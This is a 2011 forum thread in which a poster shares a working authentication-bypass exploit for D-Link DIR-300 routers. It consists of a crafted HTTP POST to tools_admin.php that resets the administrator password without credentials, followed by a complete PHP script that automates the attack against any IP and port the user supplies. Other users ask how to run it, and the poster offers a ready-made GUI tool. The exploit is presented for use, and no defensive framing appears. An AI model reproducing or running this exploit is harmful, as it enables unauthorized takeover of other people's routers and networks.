Vcoderz Community

Vcoderz Community (http://forum.vcoderz.com/index.php)
-   Computers & Information Technologies (http://forum.vcoderz.com/forumdisplay.php?f=6)
-   -   Change D-Link DIR-300 (and others) routers password (http://forum.vcoderz.com/showthread.php?t=19712)

Google 02-09-2011 03:29 AM
Change D-Link DIR-300 (and others) routers password
 
Control panel script - tools_admin.php allows attacker to change
administrator name, password and other variables without any
authorization by sending specially crafted http post request such as:

---cut here---
POST http://192.168.1.1:80/tools_admin.php HTTP/1.1
Host: 192.168.1.2
Keep-Alive: 115
Content-Type: application/x-www-form-urlencoded
Content-length: 0

ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&logi n=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name= admin&admin_password1=uhOHahEh
---cut here---

Enjoy ;)

gachkar 02-09-2011 09:06 AM
hey thanks for the post !
byut how to use it ? where to save it ? to what extension ?

Google 02-10-2011 01:51 AM
Quote:
Originally Posted by gachkar (Post 228136)
hey thanks for the post !
byut how to use it ? where to save it ? to what extension ?
That was the HTTP POST request. You can send it using any language like PHP, PERL, PYTHON... That's the PHP code:

Code:
<?php
if(sizeof($argv)!=4) {
  echo "Usage: php5 $argv[0] <router ip addres> <port>
  <admin password>\n";
  exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1=".urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
  echo "- Error: could not connect (
  http://$argv[1]:$argv[2]/tools_admin.php).\n";
  exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"login.php")===true) {
  echo "- something goes wrong (check answer - answer.html) !\n";
  $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
  exit;
}
else
  echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
If you want, I will make an GUI executable file and post it here later.

yaleil 02-13-2011 10:33 AM
can you do that please?

Google 02-17-2011 09:55 PM
Quote:
Originally Posted by yaleil (Post 228267)
can you do that please?
Here it is. But don't pwn yourself :p


All times are GMT +1. The time now is 10:10 AM.

Powered by vBulletin® Version 3.8.3
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Ad Management plugin by RedTyger